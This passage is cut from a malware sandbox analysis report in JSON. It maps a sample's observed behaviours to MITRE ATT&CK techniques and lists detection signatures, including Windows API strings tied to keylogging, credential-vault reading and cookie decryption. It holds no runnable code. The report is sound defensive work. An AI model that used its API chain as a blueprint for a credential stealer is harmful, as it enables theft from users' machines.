"https://attack.mitre.org/techniques/T1053/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Scheduled Task/Job", "attck_id": "T1053", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Scheduled Task", "attck_id": "T1053.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Scheduled Task/Job", "attck_id": "T1053", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 2, "informative_identifiers_count": 12}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "suspicious_identifiers_count": 2, "informative_identifiers_count": 7}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Reflective Code Loading", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620", "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 4, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Credential Access", "technique": "Windows Credential Manager", "attck_id": "T1555.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555/004", "informative_identifiers_count": 1, "parent": {"technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555"}}, {"tactic": "Credential Access", "technique": "Unsecured Credentials", "attck_id": "T1552", "attck_id_wiki": "https://attack.mitre.org/techniques/T1552", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credentials In Files", "attck_id": "T1552.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1552/001", "malicious_identifiers_count": 1, "parent": {"technique": "Unsecured Credentials", "attck_id": "T1552", "attck_id_wiki": "https://attack.mitre.org/techniques/T1552"}}, {"tactic": "Credential Access", "technique": "Steal Web Session Cookie", "attck_id": "T1539", "attck_id_wiki": "https://attack.mitre.org/techniques/T1539", "suspicious_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credentials from Web Browsers", "attck_id": "T1555.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555/003", "informative_identifiers_count": 1, "parent": {"technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555"}}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 18}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 1, "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 2, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Network Connections Discovery", "attck_id": "T1049", "attck_id_wiki": "https://attack.mitre.org/techniques/T1049", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Browser Information Discovery", "attck_id": "T1217", "attck_id_wiki": "https://attack.mitre.org/techniques/T1217", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 2, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 4, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Data from Information Repositories", "attck_id": "T1213", "attck_id_wiki": "https://attack.mitre.org/techniques/T1213", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 3, "informative_identifiers_count": 3}, {"tactic": "Collection", "technique": "Archive via Library", "attck_id": "T1560.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1560/002", "informative_identifiers_count": 1, "parent": {"technique": "Archive Collected Data", "attck_id": "T1560", "attck_id_wiki": "https://attack.mitre.org/techniques/T1560"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Asymmetric Cryptography", "attck_id": "T1573.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Service", "attck_id": "T1102", "attck_id_wiki": "https://attack.mitre.org/techniques/T1102", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 2, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "string-423", "type": 2, "relevance": 1, "name": "Contains ability to create directories (API string)", "description": "Found reference to API \"CreateDirectory\" (Indicator: \"CreateDirectory\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"CreateDirectory\" (Indicator: \"CreateDirectory\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API \"CreateDirectory\" (Indicator: \"CreateDirectory\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-625", "type": 2, "relevance": 1, "name": "References Windows filepaths for DLLs (possible dropped files)", "description": "Observed system executable string:\"%WINDIR%\\system32\\IMM32.DLL\" [Source: 00000000-00001916-00000C60-1055099907]\n Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll\" [Source: 00000000-00001916-00000C28-1056494121]\n Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll\" [Source: 00000000-00001916-00000C28-1057061540]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v2.0.50727_32\\mscorlib\\9f895c66454577eff9c77442d0c84f71\\mscorlib.ni.dll\" [Source: 00000000-00001916-00000C28-1058095115]\n Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\ole32.dll\" [Source: 00000000-00001916-00000C28-1058178928]\n Observed system executable string:\"%WINDIR%\\system32\\uxtheme.dll\" [Source: 00000000-00001916-00000C28-1058313112]\n Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\mscorjit.dll\" [Source: 00000000-00001916-00000C28-1059175381]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v2.0.50727_32\\System\\ad92dab7f418877d6a1e0358ce35658a\\System.ni.dll\" [Source: 00000000-00001916-00000C28-1059277866]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.VisualBas#\\6f5bf6427122bfc30b5be76bcd651018\\Microsoft.VisualBasic.ni.dll\" [Source: 00000000-00001916-00000C28-1059361917]\n Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" [Source: 00000000-00005100-00000C28-1061836525]\n Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll\" [Source: 00000000-00005100-00000C28-1062591753]\n Observed system executable string:\"%WINDIR%\\system32\\combase.dll\" [Source: 00000000-00005100-00000C28-1062686509]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll\" [Source: 00000000-00005100-00000C28-1063294177]\n Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll\" [Source: 00000000-00005100-00000C28-1063837713]\n Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll\" [Source: 00000000-00005100-00000C28-1064055763]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System\\2c3c912ea8f058f9d04c4650128feb3f\\System.ni.dll\" [Source: 00000000-00005100-00000C28-1064115016]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\31fae3290fad30c31c98651462d22724\\System.Core.ni.dll\" [Source: 00000000-00005100-00000C28-1064277882]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\96f7edb07b12303f0ec2595c7f3778c7\\System.Configuration.ni.dll\" [Source: 00000000-00005100-00000C28-1064326621]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\15af16d373cf0528cb74fc73d365fdbf\\System.Xml.ni.dll\" [Source: 00000000-00005100-00000C28-1064474167]\n Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll\" [Source: 00000000-00005100-00000C28-1064520194]\n Observed system executable string:\"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\bcrypt.dll\" [Source: 00000000-00005100-00000C28-1064849366]\n Observed system executable string:\"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\psapi.dll\" [Source: 00000000-00005100-00000C28-1065271259]", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-101", "type": 2, "relevance": 1, "name": "Contains ability to execute Windows APIs", "description": "Found reference to API (Indicator: \"Sleep\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"CreateDirectory\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"SendARP\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"SendMessage\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetTempPath\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"VaultOpenVault\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"VaultCloseVault\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"VaultFree\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"VaultEnumerateItems\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"VaultGetItem\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"BCryptOpenAlgorithmProvider\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"BCryptCloseAlgorithmProvider\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"BCryptGetProperty\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"BCryptSetProperty\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"BCryptImportKey\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"BCryptDestroyKey\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"BCryptEncrypt\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"BCryptDecrypt\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"CryptUnprotectData\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetParent\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetTempFileName\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetForegroundWindow\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetWindowThreadProcessId\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetProcessById\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"SetWindowsHookEx\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"UnhookWindowsHookEx\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"CallNextHookEx\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetModuleHandle\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetKeyState\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetKeyboardState\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetKeyboardLayout\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"ToUnicodeEx\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"MapVirtualKey\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetCurrentProcess\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"CheckRemoteDebuggerPresent\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"MessageBox\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"CreateMutex\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetWindowText\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"SetThreadExecutionState\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"RtlSetProcessIsCritical\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API (Indicator: \"Local State\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API (Indicator: \"Sleep\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API (Indicator: \"CreateDirectory\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API (Indicator: \"SendARP\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API (Indicator: \"SendMessage\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetEnvironmentVariable\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetTempPath\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API (Indicator: \"VaultOpenVault\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API (Indicator: \"VaultCloseVault\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API (Indicator: \"VaultFree\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API (Indicator: \"VaultEnumerateItems\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API (Indicator: \"VaultGetItem\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API (Indicator: \"BCryptOpenAlgorithmProvider\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API (Indicator: \"BCryptCloseAlgorithmProvider\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API (Indicator: \"BCryptGetProperty\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API (Indicator: \"BCryptSetProperty\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API (Indicator: \"BCryptImportKey\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API (Indicator: \"BCryptDestroyKey\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API (Indicator: \"BCryptEncrypt\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API (Indicator: \"BCryptDecrypt\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API (Indicator: \"CryptUnprotectData\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetParent\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetTempFileName\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetForegroundWindow\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetWindowThreadProcessId\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetProcessById\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API (Indicator: \"SetWindowsHookEx\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API (Indicator: \"UnhookWindowsHookEx\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API (Indicator: \"CallNextHookEx\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetModuleHandle\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetKeyState\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetKeyboardState\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetKeyboardLayout\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API (Indicator: 